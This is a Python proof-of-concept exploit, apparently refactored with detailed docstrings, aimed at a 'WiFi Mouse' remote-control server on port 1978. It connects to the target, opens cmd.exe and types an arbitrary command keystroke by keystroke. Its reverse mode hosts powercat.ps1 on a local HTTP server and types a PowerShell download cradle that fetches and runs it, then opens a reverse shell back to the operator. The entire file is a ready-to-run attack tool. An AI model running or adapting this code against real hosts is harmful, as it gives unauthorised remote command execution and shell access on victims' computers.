#!/usr/bin/python3

import argparse
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import os

port = 1978  # TCP port on the target that main() connects to (the WiFi Mouse server this PoC targets)

# Keystroke table: every printable ASCII character (0x20-0x7E, 95 entries)
# mapped to its two-digit lowercase hex byte value, e.g. "A" -> "41".
# SendString indexes this table for each payload character, so anything
# outside it (tab, newline, non-ASCII) raises KeyError there.
_TYPEABLE = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890 +=/_<>[]!@#$%^&*()-'\":;?`~\\|{},."
)
characters = dict(zip(_TYPEABLE, (format(ord(ch), "02x") for ch in _TYPEABLE)))


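def openCMD(target):
    """Ask the server to launch cmd.exe on the target.

    Sends the literal command ``openfile /C/Windows/System32/cmd.exe``
    followed by a newline - exactly the bytes the original hex string
    encoded. ``sendall`` replaces ``send`` because ``socket.send`` may
    transmit only part of the buffer; a truncated command would silently
    fail to open the shell that the rest of the exploit types into.

    Args:
        target: connected TCP socket to the server.
    """
    target.sendall(b"openfile /C/Windows/System32/cmd.exe\n")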


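def SendString(target, string, delay=0.03):
    """Type ``string`` on the target one keystroke at a time.

    Each character is sent as its own ``utf8 <char>`` + newline message,
    with the character's byte taken from the ``characters`` table, and a
    short pause after every keystroke (presumably so the server keeps up).
    The whole string is validated *before* anything is sent: the original
    raised KeyError on the first unsupported character mid-loop, which left
    a half-typed command sitting in the cmd.exe window opened by openCMD.
    ``sendall`` is used because ``socket.send`` may write only part of the
    buffer.

    Args:
        target: connected TCP socket to the server.
        string: text to type; every character must be a key of
            ``characters`` (printable ASCII). An empty string sends nothing.
        delay: seconds to sleep after each keystroke (default 0.03, as before).

    Raises:
        ValueError: if ``string`` contains a character not in ``characters``.
    """
    unsupported = sorted({ch for ch in string if ch not in characters})
    if unsupported:
        raise ValueError(
            f"cannot type characters {unsupported!r}; only keys of 'characters' are supported"
        )
    for ch in string:
        # b"utf8 " + <char byte> + b"\n" - identical to the original hex-built packet.
        target.sendall(b"utf8 " + bytes.fromhex(characters[ch]) + b"\n")
        sleep(delay)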


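def SendReturn(target, delay=0.5):
    """Send the key message the script uses as Enter, then wait.

    Transmits the literal ``key  3RTN`` (two spaces, and - unlike openCMD and
    SendString - no trailing newline; these are exactly the bytes the original
    hex string encoded, preserved as-is). Called after SendString so the typed
    command line is executed. ``sendall`` replaces ``send`` because
    ``socket.send`` may write only part of the buffer.

    Args:
        target: connected TCP socket to the server.
        delay: seconds to wait afterwards (default 0.5, as before).
    """
    target.sendall(b"key  3RTN")
    sleep(delay)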


def exploit(target, payload):
    """Run the full sequence against an already-connected socket.

    Order matters and is unchanged: pause, open cmd.exe (openCMD), pause,
    type ``payload`` keystroke by keystroke (SendString), press Enter
    (SendReturn). Progress lines go to stdout. The caller owns the socket.

    Args:
        target: connected TCP socket to the server.
        payload: command line to type; must consist of characters that
            SendString can send.
    """
    def announce(message, pause):
        # Print a progress line, then give the server a moment.
        print(message)
        sleep(pause)

    announce("[+] Zzz ...", 1)
    openCMD(target)
    announce("[+] Sending payload...", 1)
    SendString(target, payload)
    SendReturn(target)
    print("[+] Done!")


def generate_reverse_payload(http_ip, http_port, rev_ip, rev_port):
    """Build the command line typed into cmd.exe for the ``-r`` mode.

    The result is a PowerShell one-liner: a download cradle that fetches
    ``powercat.ps1`` over plain HTTP from ``http_ip:http_port`` (the server
    started by main()) and IEX-es it, then ``powercat`` connecting back to
    ``rev_ip:rev_port`` with a PowerShell shell. No quoting or escaping is
    applied to the arguments, and the caller is responsible for the output
    containing only characters SendString can type.

    Args:
        http_ip, http_port: where the target fetches powercat.ps1 from.
        rev_ip, rev_port: where the reverse shell connects back to.

    Returns:
        The command line as a str.
    """
    cradle = (
        "IEX(New-Object System.Net.WebClient)"
        f".DownloadString('http://{http_ip}:{http_port}/powercat.ps1')"
    )
    connect_back = f"powercat -c {rev_ip} -p {rev_port} -e powershell"
    return f'powershell.exe -c "{cradle};{connect_back}"'

class LoggingHandler(SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler that echoes each request to stdout.

    File serving is the base-class default (the current working directory);
    only the log line format differs, so the operator can see when the
    target fetches the hosted script.
    """

    def log_message(self, format, *args):
        # Same line the original emitted: "[HTTP Request] <client> - <message>".
        client = self.address_string()
        print("[HTTP Request] %s - %s" % (client, format % args))


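def start_http_server(ip, port):
    """Serve the current working directory over HTTP, blocking forever.

    main() runs this in a daemon thread so the target can fetch powercat.ps1.
    There is no shutdown path other than process exit.

    Security note: SimpleHTTPRequestHandler exposes *every* file under the
    current directory to anyone who can reach ip:port, not just powercat.ps1.
    Run the script from a directory that holds nothing else.

    Args:
        ip: address to bind, passed straight to HTTPServer.
        port: port to bind, as str or int.
    """
    # The original called os.chdir(".") first; that is a no-op and was dropped.
    # The context manager closes the listening socket if serve_forever raises.
    with HTTPServer((ip, int(port)), LoggingHandler) as httpd:
        print(f"[+] Serving HTTP on {ip}:{port} ...")
        httpd.serve_forever()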


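def _split_host_port(parser, value, flag):
    """Parse an ``IP:PORT`` option value, exiting via parser.error() on bad input."""
    host, _, port_str = value.partition(":")
    if not host or not port_str.isdigit() or ":" in port_str:
        parser.error(f"{flag} expects IP:PORT, got {value!r}")
    return host, port_str


def main():
    """CLI entry point: connect to the target and type a command into cmd.exe.

    ``-p`` types the given command verbatim. ``-r IP:PORT`` (with ``-l IP:PORT``)
    starts a local HTTP server in a daemon thread serving the current
    directory (must contain powercat.ps1) and types a PowerShell download
    cradle that connects back to IP:PORT. Usage errors exit through argparse.

    Caveat: the HTTP server thread cannot report a bind failure back here, so
    confirm the "[+] Serving HTTP on ..." line appears before the payload is
    typed.
    """
    parser = argparse.ArgumentParser(description="WiFi Mouse Exploit")
    parser.add_argument("-t", "--target", required=True, help="Target IP")
    parser.add_argument("-p", "--payload", required=False, help="Payload command")
    parser.add_argument("-r", "--reverse", help="Reverse shell IP:PORT")
    parser.add_argument("-l", "--http", help="HTTP server IP:PORT (required if using -r)")

    args = parser.parse_args()

    if args.reverse:
        if not args.http:
            parser.error("-l HTTP_IP:HTTP_PORT is required if -r is specified")
        # Validated here so a malformed value gives a usage message rather than
        # an unpacking traceback.
        rev_ip, rev_port = _split_host_port(parser, args.reverse, "-r")
        http_ip, http_port = _split_host_port(parser, args.http, "-l")

        if not os.path.isfile("powercat.ps1"):
            # Message kept verbatim (French): powercat.ps1 was not found in the current directory.
            print("[!] Le fichier powercat.ps1 est introuvable dans le répertoire courant.")
            raise SystemExit(1)

        http_thread = threading.Thread(
            target=start_http_server, args=(http_ip, http_port), daemon=True
        )
        http_thread.start()
        payload = generate_reverse_payload(http_ip, http_port, rev_ip, rev_port)

    elif args.payload:
        payload = args.payload
    else:
        parser.error("You must specify either -p or -r")

    # Fail before touching the target: SendString can only type characters in
    # the `characters` table, and aborting mid-payload would leave a partial
    # command sitting in cmd.exe on the victim.
    untypeable = sorted({ch for ch in payload if ch not in characters})
    if untypeable:
        parser.error(f"payload contains characters that cannot be typed: {untypeable!r}")

    # The context manager closes the socket even if exploit() raises.
    with socket(AF_INET, SOCK_STREAM) as target:
        target.connect((args.target, port))
        exploit(target, payload)
        sleep(3)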


# Script entry point; importing the module only defines the helpers and
# tables above and never connects anywhere.
if __name__ == "__main__":
    main()